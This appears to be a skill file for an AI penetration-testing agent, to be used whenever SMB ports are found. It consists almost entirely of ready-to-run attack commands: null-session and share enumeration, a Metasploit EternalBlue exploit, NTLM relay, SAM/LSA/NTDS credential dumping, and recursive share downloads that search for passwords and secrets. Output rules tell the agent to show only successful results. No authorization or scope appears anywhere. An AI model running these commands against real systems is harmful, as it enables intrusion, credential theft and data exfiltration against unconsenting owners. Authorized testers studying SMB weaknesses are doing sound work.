| name | svc-smb |
| description | SMB/CIFS attack techniques — null sessions, share enumeration, NTLM relay, EternalBlue, signing checks. Use when SMB is found. Triggers - ports 445/139, netbios, MS17-010 EternalBlue, signing:False, null session, share access, PetitPotam/coerce. |
SMB Attack Reference
Enumeration
enum4linux-ng -A <target>
smbclient -N -L //<target>
crackmapexec smb <target> --shares
crackmapexec smb <target> -u '' -p '' --shares
crackmapexec smb <target> -u 'guest' -p '' --shares
crackmapexec smb <target> --users
rpcclient -U '' -N <target> -c 'enumdomusers'
rpcclient -U '' -N <target> -c 'enumdomgroups'
crackmapexec smb <target>
nmap --script smb-security-mode -p 445 <target>
Null Session Access
smbclient -N //<target>/<share>
smbmap -H <target> -u '' -p ''
rpcclient -U '' -N <target>
Critical Vulnerabilities
nmap --script smb-vuln-ms17-010 -p 445 <target>
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS <target>; run"
nmap --script smb-vuln-cve-2020-0796 -p 445 <target>
SMB Relay
crackmapexec smb <target> --gen-relay-list relay_targets.txt
impacket-ntlmrelayx -tf relay_targets.txt -smb2support
Post-Auth Credential Dumping (with admin access)
netexec smb <target> -u <user> -p <pass> --sam
netexec smb <target> -u <user> -p <pass> --lsa
netexec smb <target> -u <user> -p <pass> --dpapi
netexec smb <dc> -u <user> -p <pass> --ntds
secretsdump.py <domain>/<user>:<pass>@<target>
Share Access & Data Exfil
smbclient //<target>/<share> -U <user>%<password>
smbget -R smb://<target>/<share> -U <user>%<password>
crackmapexec smb <target> -u <user> -p <password> --spider <share> --pattern "passw|secret|cred|key|config"
Output Rules
- Always use quiet/filtered output flags. Only show successful results.
- For netexec/crackmapexec: pipe through
grep '[+]' for brute-force runs.
- Redirect large output to files. Never paste >50 lines of raw tool output.
- Use
cme_parse for auto-processing netexec output.